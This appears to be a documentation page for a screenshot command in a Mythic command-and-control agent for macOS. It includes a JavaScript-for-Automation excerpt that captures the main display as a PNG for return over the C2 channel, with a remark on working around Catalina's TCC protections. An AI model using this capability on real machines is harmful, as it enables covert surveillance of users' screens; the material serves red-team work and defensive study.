Summary
Use the built-in CGDisplay API calls to capture the display and send it back over the C2 channel.
- Needs Admin: False
- Version: 1
- Author: @its_a_feature_
In Catalina+ (10.15+) there are TCC protections against this, so be careful
Arguments
Usage
MITRE ATT&CK Mapping
Detailed Summary
This uses API calls to read the current screen the return it to Mythic. This doesn’t currently capture all screens though.
let cgimage = $.CGDisplayCreateImage($.CGMainDisplayID());
if(cgimage.js === undefined) {
cgimage = $.CFMakeCollectable(cgimage); // in case 10.15 is messing with the types again
}
if(cgimage.js === undefined){
return {"user_output":"Failed to get image from display", "completed": true, "status": "error"};
}
let bitmapimagerep = $.NSBitmapImageRep.alloc.initWithCGImage(cgimage);
let capture = bitmapimagerep.representationUsingTypeProperties($.NSBitmapImageFileTypePNG, Ref());
